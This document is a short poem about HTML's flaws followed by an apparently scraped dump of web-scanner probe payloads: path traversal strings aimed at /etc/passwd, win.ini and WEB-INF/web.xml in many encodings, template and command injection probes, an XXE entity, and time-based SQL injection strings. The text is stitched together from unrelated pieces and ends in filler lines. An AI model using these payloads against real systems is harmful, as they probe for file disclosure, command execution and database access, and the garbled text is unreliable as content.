HTML, oh HTML, how broken you are
Your syntax so convoluted, your tags so bizarre
Your semantic meaning, oh so unclear
Making it difficult to know what's held dear
Your presentation and content, they're intertwined
Making it hard to change one without the other intertwined
Your interactive elements, oh so limited
It's a struggle to create them, we're so inhibited
But still we use you, HTML, every day
Despite your flaws, you never go away
You're the foundation of the web, we can't deny
HTML, oh HTML, you'll never truly die
So here's to you, HTML, warts and all
We'll keep coding, standing tall
For better or worse, you're here to stay
HTML, oh HTML, in every way.
...
...
...
../../../../../../../../../../../../../../../../../../etc/passwd
...
...
...
...
...
...
../../../../../../../../../../../../../../../../../../etc/passwd ...
...
...
...
...
...
...
...
...
${@var_dump(md5(653973027))};
./../../../../../../../../../../../../../../../../../../etc/passwd
izjrdbrlrrxzvtgpenso
...
...
...
<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY content SYSTEM "http://0.0.0.0:40183/i/910578/gtwd/fqtw/">]><a>&content;</a>
...
${994777996+877956251}
...
'-var_dump(md5(933346427))-'
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
...
...
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd
...
... expr 916375776 + 854883142
...
../../../../../../etc/passwd
...|expr 952546765 + 864880073
/*1*/{{816702058+834928273}}
../../../../../../etc/passwd ...
...$(expr 843471086 + 872442260)
${826888941+810142189}
./../../../../../../etc/passwd
...&set /A 852999461+969677483
${(850660257+849854698)?c}
...
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
expr 937777176 + 811460254
#set($c=936715832+934353986)${c}$c
...
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd
<%- 902851758+877437848 %>
...
/etc/passwd
...
/etc/passwd ...
...
%2fetc%2fpasswd
...
%u2215etc%u2215passwd
...
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
...
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
...
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini ...
...
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini
...
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini
...
..\..\..\..\..\..\windows/win.ini
...
.\..\..\..\..\..\..\windows/win.ini
...
...
..\..\..\..\..\..\windows/win.ini ...
...'and/**/extractvalue(1,concat(char(126),md5(1161825458)))and'
...
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini
..."and/**/extractvalue(1,concat(char(126),md5(1330302412)))and"
...
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini
extractvalue(1,concat(char(126),md5(1356448683)))
...
../../../../../../../../../../../../../../../../../../windows/win.ini
...'and(select'1'from/**/cast(md5(1648557429)as/**/int))>'0
...
./../../../../../../../../../../../../../../../../../../windows/win.ini
.../**/and/**/cast(md5('1789633728')as/**/int)>0
...
../../../../../../../../../../../../../../../../../../windows/win.ini ...
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1849675121')))
...
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini
...'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1906595108')))>'0
...
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini
...鎈'"\(
...
../../../../../../windows/win.ini
...'"\(
...
./../../../../../../windows/win.ini
...
../../../../../../windows/win.ini ...
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini
...
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini
...
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
...
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
...'and'w'='w
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini ...
...'and'g'='c
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini
..."and"u"="u
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini
..."and"g"="q
..\..\..\..\..\..\windows/win.ini
...'and(select*from(select+sleep(0))a/**/union/**/select+1)='
.\..\..\..\..\..\..\windows/win.ini
...'and(select*from(select+sleep(2))a/**/union/**/select+1)='
..\..\..\..\..\..\windows/win.ini ...
..."and(select*from(select+sleep(0))a/**/union/**/select+1)="
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini
..."and(select*from(select+sleep(2))a/**/union/**/select+1)="
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216windows/win%u002eini
...'/**/and(select'1'from/**/pg_sleep(0))::text>'0
../../../../../../../../../../../../../../../../../../windows/win.ini
...'/**/and(select'1'from/**/pg_sleep(2))::text>'0
./../../../../../../../../../../../../../../../../../../windows/win.ini
...'and(select+1)>0waitfor/**/delay'0:0:0
../../../../../../../../../../../../../../../../../../windows/win.ini ...
...'and(select+1)>0waitfor/**/delay'0:0:2
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini
...'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini
...'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',2)='z
../../../../../../windows/win.ini
./../../../../../../windows/win.ini
../../../../../../windows/win.ini ...
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215windows%u2215win%u002eini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini ...
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini
..\..\..\..\..\..\Windows\win.ini
.\..\..\..\..\..\..\Windows\win.ini
..\..\..\..\..\..\Windows\win.ini ...
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini
../../../../../../../../../../../../../../../../../../Windows/win.ini
./../../../../../../../../../../../../../../../../../../Windows/win.ini
../../../../../../../../../../../../../../../../../../Windows/win.ini ...
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini
../../../../../../Windows/win.ini
./../../../../../../Windows/win.ini
../../../../../../Windows/win.ini ...
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini
WEB-INF/web.xml
WEB-INF/web.xml;...
../WEB-INF/web.xml
../WEB-INF/web.xml;...
../../WEB-INF/web.xml
../../WEB-INF/web.xml;...
../../../WEB-INF/web.xml
../../../WEB-INF/web.xml;...
../../../../WEB-INF/web.xml
../../../../WEB-INF/web.xml;...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
...
bro<i>bro